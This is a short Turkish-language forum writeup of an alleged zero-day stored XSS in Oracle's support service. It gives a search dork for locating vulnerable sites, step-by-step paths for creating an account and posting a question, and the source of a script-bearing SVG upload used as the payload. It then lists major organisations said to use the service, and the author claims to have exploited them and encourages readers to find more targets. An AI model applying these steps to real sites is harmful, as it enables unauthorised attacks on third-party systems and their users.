Oracle Service 0day Exploit Writeup
Merhabalar bu yazımda Oracle'ın bir servisi olan ve onlarca büyük şirketin kullandığı Support servisinde bulunan XSS açığından bahsedicem.
Öncelikle dorkumuz:
Kod:
inurl:/app/answers/list
İlk önce açıklı sitenin support servisinde hesap oluşturmamız gerek.
Hesap Oluşturma Yolu
Kod:
http://xxxx.com/app/utils/create_account
Hesabı oluşturduktan sonra Ask a Question bölümüne gidip payload içeren svg dosyasını da ekleyip sorunuzu gönderin.
Soru Sorma Yolu
Kod:
http://xxxx.com/app/ask
Destek geçmişi sayfasına gidip listeden sorduğunuz soruyu açın. Ve sorunuzun bilgi sayfasından eklediğiniz dosyayı açın.
Destek Geçmişi Yolu
Kod:
http://xxxx.com/app/account/questions/list
Payload çalıştı
Svg dosyası kaynak kodu
Kod:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script>
alert(123)
</script>
</svg>
Bu servisi kullanan bazı siteler:
Nasa
IEEE
Kodak
Sandisk
Nike
Nvidia
Adı üstünde "0day", yukarıdaki şirketleri ve birçok siteyi sömürdüm ama tabiki arayabilirsiniz.